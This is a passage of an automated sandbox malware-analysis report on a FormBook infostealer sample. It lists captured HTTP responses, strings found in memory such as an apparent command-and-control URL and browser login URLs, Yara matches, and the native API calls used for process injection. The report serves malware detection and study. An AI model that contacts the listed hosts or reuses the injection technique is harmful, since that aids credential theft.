Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 05:40:39 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 05:40:42 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Source: UQO06iOMKZMPZ4A.exe	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: UQO06iOMKZMPZ4A.exe	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: UQO06iOMKZMPZ4A.exe	String found in binary or memory: http://ocsp.comodoca.com0
Source: Amcache.hve.5.dr	String found in binary or memory: http://upx.sf.net
Source: UQO06iOMKZMPZ4A.exe, 00000000.00000002.1796682227.0000000008FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: UQO06iOMKZMPZ4A.exe, 00000000.00000002.1796682227.0000000008FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: DpzZIqplfZXGlyHqisknlKbWCP.exe, 0000000C.00000002.2879612118.0000000005551000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.dntchunkysalsa.com
Source: DpzZIqplfZXGlyHqisknlKbWCP.exe, 0000000C.00000002.2879612118.0000000005551000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.dntchunkysalsa.com/qruc/
Source: UQO06iOMKZMPZ4A.exe, 00000000.00000002.1796682227.0000000008FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: UQO06iOMKZMPZ4A.exe, 00000000.00000002.1796682227.0000000008FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: UQO06iOMKZMPZ4A.exe, 00000000.00000002.1796682227.0000000008FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: UQO06iOMKZMPZ4A.exe, 00000000.00000002.1796682227.0000000008FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: UQO06iOMKZMPZ4A.exe, 00000000.00000002.1796682227.0000000008FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: UQO06iOMKZMPZ4A.exe, 00000000.00000002.1796682227.0000000008FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: UQO06iOMKZMPZ4A.exe, 00000000.00000002.1796682227.0000000008FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: UQO06iOMKZMPZ4A.exe, 00000000.00000002.1796682227.0000000008FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: UQO06iOMKZMPZ4A.exe, 00000000.00000002.1796682227.0000000008FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: UQO06iOMKZMPZ4A.exe, 00000000.00000002.1796682227.0000000008FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: UQO06iOMKZMPZ4A.exe, 00000000.00000002.1796682227.0000000008FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: UQO06iOMKZMPZ4A.exe, 00000000.00000002.1796682227.0000000008FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: UQO06iOMKZMPZ4A.exe, 00000000.00000002.1796682227.0000000008FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: UQO06iOMKZMPZ4A.exe, 00000000.00000002.1796682227.0000000008FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: UQO06iOMKZMPZ4A.exe, 00000000.00000002.1796682227.0000000008FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: UQO06iOMKZMPZ4A.exe, 00000000.00000002.1796682227.0000000008FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: unlodctr.exe, 0000000B.00000002.2875903502.00000000043C4000.00000004.10000000.00040000.00000000.sdmp, DpzZIqplfZXGlyHqisknlKbWCP.exe, 0000000C.00000002.2874692684.00000000034B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.2357220353.00000000123C4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.litespeedtech.com/error-page
Source: UQO06iOMKZMPZ4A.exe, 00000000.00000002.1796682227.0000000008FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: UQO06iOMKZMPZ4A.exe, 00000000.00000002.1796682227.0000000008FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: UQO06iOMKZMPZ4A.exe, 00000000.00000002.1796682227.0000000008FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: UQO06iOMKZMPZ4A.exe, 00000000.00000002.1796682227.0000000008FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: UQO06iOMKZMPZ4A.exe, 00000000.00000002.1796682227.0000000008FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: UQO06iOMKZMPZ4A.exe, 00000000.00000002.1796682227.0000000008FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: UQO06iOMKZMPZ4A.exe, 00000000.00000002.1796682227.0000000008FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: unlodctr.exe, 0000000B.00000003.2253314479.0000000008198000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: unlodctr.exe, 0000000B.00000003.2253314479.0000000008198000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: unlodctr.exe, 0000000B.00000003.2253314479.0000000008198000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: unlodctr.exe, 0000000B.00000003.2253314479.0000000008198000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: unlodctr.exe, 0000000B.00000002.2875903502.00000000046E8000.00000004.10000000.00040000.00000000.sdmp, unlodctr.exe, 0000000B.00000002.2881271761.00000000066E0000.00000004.00000800.00020000.00000000.sdmp, DpzZIqplfZXGlyHqisknlKbWCP.exe, 0000000C.00000002.2874692684.00000000037D8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://domaincntrol.com/?orighost=
Source: unlodctr.exe, 0000000B.00000003.2253314479.0000000008198000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: unlodctr.exe, 0000000B.00000003.2253314479.0000000008198000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: unlodctr.exe, 0000000B.00000003.2253314479.0000000008198000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: unlodctr.exe, 0000000B.00000002.2871913958.000000000335F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: unlodctr.exe, 0000000B.00000002.2871913958.000000000335F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: unlodctr.exe, 0000000B.00000002.2871913958.000000000335F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: unlodctr.exe, 0000000B.00000002.2871913958.000000000335F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033$
Source: unlodctr.exe, 0000000B.00000002.2871913958.000000000335F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: unlodctr.exe, 0000000B.00000002.2871913958.000000000335F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: unlodctr.exe, 0000000B.00000003.2246494991.0000000008178000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: unlodctr.exe, 0000000B.00000002.2875903502.00000000046E8000.00000004.10000000.00040000.00000000.sdmp, unlodctr.exe, 0000000B.00000002.2881271761.00000000066E0000.00000004.00000800.00020000.00000000.sdmp, DpzZIqplfZXGlyHqisknlKbWCP.exe, 0000000C.00000002.2874692684.00000000037D8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://nojs.domaincntrol.com
Source: UQO06iOMKZMPZ4A.exe	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: unlodctr.exe, 0000000B.00000003.2253314479.0000000008198000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: unlodctr.exe, 0000000B.00000003.2253314479.0000000008198000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.UQO06iOMKZMPZ4A.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UQO06iOMKZMPZ4A.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2873773132.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2062443997.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2871535799.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2873698812.0000000003730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2064726692.0000000001D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2874222772.0000000003AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2065008686.0000000003330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.UQO06iOMKZMPZ4A.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.UQO06iOMKZMPZ4A.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.2873773132.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2062443997.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.2871535799.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.2873698812.0000000003730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2064726692.0000000001D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.2874222772.0000000003AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2065008686.0000000003330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Contains functionality to call native functions

Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_0042AE33 NtClose,	2_2_0042AE33
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_01A62B60 NtClose,LdrInitializeThunk,	2_2_01A62B60
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_01A62DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_01A62DF0
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_01A62C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_01A62C70
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_01A635C0 NtCreateMutant,LdrInitializeThunk,	2_2_01A635C0
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_01A64340 NtSetContextThread,	2_2_01A64340
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_01A64650 NtSuspendThread,	2_2_01A64650
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_01A62BA0 NtEnumerateValueKey,	2_2_01A62BA0
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_01A62B80 NtQueryInformationFile,	2_2_01A62B80
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_01A62BE0 NtQueryValueKey,	2_2_01A62BE0
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_01A62BF0 NtAllocateVirtualMemory,	2_2_01A62BF0
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_01A62AB0 NtWaitForSingleObject,	2_2_01A62AB0
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_01A62AF0 NtWriteFile,	2_2_01A62AF0
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_01A62AD0 NtReadFile,	2_2_01A62AD0
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_01A62DB0 NtEnumerateKey,	2_2_01A62DB0
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_01A62DD0 NtDelayExecution,	2_2_01A62DD0
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_01A62D30 NtUnmapViewOfSection,	2_2_01A62D30
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_01A62D00 NtSetInformationFile,	2_2_01A62D00
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_01A62D10 NtMapViewOfSection,	2_2_01A62D10
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_01A62CA0 NtQueryInformationToken,	2_2_01A62CA0
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_01A62CF0 NtOpenProcess,	2_2_01A62CF0
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_01A62CC0 NtQueryVirtualMemory,	2_2_01A62CC0
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_01A62C00 NtQueryInformationProcess,	2_2_01A62C00
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_01A62C60 NtCreateKey,	2_2_01A62C60
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_01A62FA0 NtQuerySection,	2_2_01A62FA0
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_01A62FB0 NtResumeThread,	2_2_01A62FB0
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_01A62F90 NtProtectVirtualMemory,	2_2_01A62F90
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_01A62FE0 NtCreateFile,	2_2_01A62FE0
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_01A62F30 NtCreateSection,	2_2_01A62F30
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_01A62F60 NtCreateProcessEx,	2_2_01A62F60
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_01A62EA0 NtAdjustPrivilegesToken,	2_2_01A62EA0
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_01A62E80 NtReadVirtualMemory,	2_2_01A62E80
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_01A62EE0 NtQueueApcThread,	2_2_01A62EE0
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_01A62E30 NtWriteVirtualMemory,	2_2_01A62E30
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_01A63090 NtSetValueKey,	2_2_01A63090
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_01A63010 NtOpenDirectoryObject,	2_2_01A63010
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_01A639B0 NtGetContextThread,	2_2_01A639B0
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_01A63D10 NtOpenProcessToken,	2_2_01A63D10
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 2_2_01A63D70 NtOpenThread,	2_2_01A63D70
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_03A24340 NtSetContextThread,LdrInitializeThunk,	11_2_03A24340
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_03A24650 NtSuspendThread,LdrInitializeThunk,	11_2_03A24650
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_03A22BA0 NtEnumerateValueKey,LdrInitializeThunk,	11_2_03A22BA0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_03A22BE0 NtQueryValueKey,LdrInitializeThunk,	11_2_03A22BE0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_03A22BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	11_2_03A22BF0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_03A22B60 NtClose,LdrInitializeThunk,	11_2_03A22B60
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_03A22AF0 NtWriteFile,LdrInitializeThunk,	11_2_03A22AF0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_03A22AD0 NtReadFile,LdrInitializeThunk,	11_2_03A22AD0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_03A22FB0 NtResumeThread,LdrInitializeThunk,	11_2_03A22FB0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_03A22FE0 NtCreateFile,LdrInitializeThunk,	11_2_03A22FE0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_03A22F30 NtCreateSection,LdrInitializeThunk,	11_2_03A22F30
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_03A22E80 NtReadVirtualMemory,LdrInitializeThunk,	11_2_03A22E80
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_03A22EE0 NtQueueApcThread,LdrInitializeThunk,	11_2_03A22EE0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_03A22DF0 NtQuerySystemInformation,LdrInitializeThunk,	11_2_03A22DF0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_03A22DD0 NtDelayExecution,LdrInitializeThunk,	11_2_03A22DD0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_03A22D30 NtUnmapViewOfSection,LdrInitializeThunk,	11_2_03A22D30
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_03A22D10 NtMapViewOfSection,LdrInitializeThunk,	11_2_03A22D10
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_03A22CA0 NtQueryInformationToken,LdrInitializeThunk,	11_2_03A22CA0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_03A22C60 NtCreateKey,LdrInitializeThunk,	11_2_03A22C60
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_03A22C70 NtFreeVirtualMemory,LdrInitializeThunk,	11_2_03A22C70
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_03A235C0 NtCreateMutant,LdrInitializeThunk,	11_2_03A235C0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_03A239B0 NtGetContextThread,LdrInitializeThunk,	11_2_03A239B0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_03A22B80 NtQueryInformationFile,	11_2_03A22B80
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_03A22AB0 NtWaitForSingleObject,	11_2_03A22AB0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_03A22FA0 NtQuerySection,	11_2_03A22FA0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_03A22F90 NtProtectVirtualMemory,	11_2_03A22F90
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_03A22F60 NtCreateProcessEx,	11_2_03A22F60
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_03A22EA0 NtAdjustPrivilegesToken,	11_2_03A22EA0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_03A22E30 NtWriteVirtualMemory,	11_2_03A22E30
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_03A22DB0 NtEnumerateKey,	11_2_03A22DB0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_03A22D00 NtSetInformationFile,	11_2_03A22D00
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_03A22CF0 NtOpenProcess,	11_2_03A22CF0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_03A22CC0 NtQueryVirtualMemory,	11_2_03A22CC0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_03A22C00 NtQueryInformationProcess,	11_2_03A22C00
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_03A23090 NtSetValueKey,	11_2_03A23090
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_03A23010 NtOpenDirectoryObject,	11_2_03A23010
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_03A23D10 NtOpenProcessToken,	11_2_03A23D10
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_03A23D70 NtOpenThread,	11_2_03A23D70
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_02FA7660 NtCreateFile,	11_2_02FA7660
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_02FA77C0 NtReadFile,	11_2_02FA77C0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_02FA7A80 NtAllocateVirtualMemory,	11_2_02FA7A80
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_02FA78A0 NtDeleteFile,	11_2_02FA78A0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 11_2_02FA7930 NtClose,	11_2_02FA7930

Detected potential crypto function

Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 0_2_00BC1398	0_2_00BC1398
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 0_2_00BC25D1	0_2_00BC25D1
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 0_2_00BC3508	0_2_00BC3508
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 0_2_00BC1BC8	0_2_00BC1BC8
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 0_2_00BC2048	0_2_00BC2048
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 0_2_00BC12F7	0_2_00BC12F7
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 0_2_00BC3407	0_2_00BC3407
